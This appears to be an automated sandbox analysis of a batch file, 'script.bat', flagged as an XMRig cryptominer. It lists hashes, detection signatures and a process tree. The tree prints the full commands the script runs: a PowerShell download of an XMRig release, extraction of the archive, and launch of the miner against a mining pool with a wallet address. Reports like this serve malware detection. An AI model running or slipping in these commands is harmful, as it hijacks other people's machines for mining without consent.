Analysis
-
max time kernel
899s -
max time network
899s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
28/03/2025, 10:10
Behavioral task
behavioral1
Sample
script.bat
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
script.bat
Resource
win10ltsc2021-20250314-en
General
-
Target
script.bat
-
Size
793B
-
MD5
f29c7cf031f619739012fdbfa95bba54
-
SHA1
ccddd138b2e91a4da65da97ec11f2dc661782e60
-
SHA256
5e45e7089ffaee30e35a4b61eb918255fbd60c8876956c039165c89a45b51717
-
SHA512
1eaff6b177df441c856001e7b1367bc6697552f52249df64531d7eaa6ce5c3b05acfb8b6df791370acc7516cdc798b629693f3ce0b26062998ccd7fb558386e5
Malware Config
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral1/files/0x00070000000242a9-58.dat family_xmrig behavioral1/files/0x00070000000242a9-58.dat xmrig behavioral1/memory/3100-60-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-61-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-62-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-63-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-64-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-65-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-66-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-67-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-68-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-69-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-70-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-71-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-72-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-73-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-74-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-75-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-76-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-77-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-78-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-79-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-80-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-81-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-82-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-83-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-84-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-85-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-86-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-87-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-88-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-89-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-90-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-91-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-92-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-93-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-94-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-95-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-96-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-97-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-98-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-99-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-100-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-101-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-102-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-103-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-104-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-105-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-106-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-107-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-108-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-109-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-110-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-111-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-112-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-113-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-114-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-115-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-116-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-117-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-118-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-119-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-120-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig behavioral1/memory/3100-121-0x00007FF7F43B0000-0x00007FF7F4FE4000-memory.dmp xmrig -
Xmrig family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 6 5672 powershell.exe 9 5672 powershell.exe -
pid Process 5672 powershell.exe 2280 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 3100 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 5672 powershell.exe 5672 powershell.exe 2280 powershell.exe 2280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 5672 powershell.exe Token: SeDebugPrivilege 2280 powershell.exe Token: SeLockMemoryPrivilege 3100 xmrig.exe Token: SeLockMemoryPrivilege 3100 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3100 xmrig.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 5904 wrote to memory of 5672 5904 cmd.exe 88 PID 5904 wrote to memory of 5672 5904 cmd.exe 88 PID 5904 wrote to memory of 2280 5904 cmd.exe 97 PID 5904 wrote to memory of 2280 5904 cmd.exe 97 PID 5904 wrote to memory of 3100 5904 cmd.exe 98 PID 5904 wrote to memory of 3100 5904 cmd.exe 98
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\script.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5904 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-gcc-win64.zip' -OutFile 'C:\Users\Admin\Downloads\xmrig.zip'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5672
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\Downloads\xmrig.zip' -DestinationPath 'C:\Users\Admin\Downloads\xmrig' -Force"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2280
-
-
C:\Users\Admin\Downloads\xmrig\xmrig-6.22.2\xmrig.exexmrig.exe -o xmrpool.eu:3333 -u 48iBkXw7ciAGbjhPdopSM8JtQy2rAx7MZgX2xbf6Sx3oASN6kAQo6nWYDwmDk6kmYPeVRPi8p1KUUGnp6T3Csuge8aPMtYS -p device32⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3100
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD54c3c8398c8732aa211d17606c6441cbc
SHA1601ac10fa21ab64e27df1e505b4465b5f8fc3ef5
SHA256d758cfc89c014a2f5523680eb01e675bad09bf565022a00433c45da36a7df9a0
SHA512a160406a23a78035470c5c1f8bf12f9ef87c1f642ea7afd79313fcd3c7d3b5bc63d265bfc544b3e699ef164e409962e44451c9bc991d5d8c75575c065d5a9183
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.6MB
MD55e48d84b33cc0ca0cdb29b03a875fd3a
SHA1597660c787259fad45f0e69cbb64fb781333c598
SHA25653b37a734ab27bb40626c6434029defbebe8470f2d89b97e7ce85b40c9a3b05f
SHA512a8a3d14a0ffb27fbc1a3e73c3e8dd2d0d7a35e9dc89eb14d9704d75cc9f424c539c042ae71c56197a90915a44fc19f4942c27b87aa0feae339b15a2853fdd3a8
-
Filesize
9.1MB
MD5cb166d49ce846727ed70134b589b0142
SHA18f5e1c7792e9580f2b10d7bef6dc7e63ea044688
SHA25649da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb
SHA512a39bd86a148af26fd31a0d171078fb7bce0951bb8ea63658d87f6bde97dbc214c62e8bd7152d1e621051de8a0ba77ffd7bda7c1106afb740584c80e68e1912ed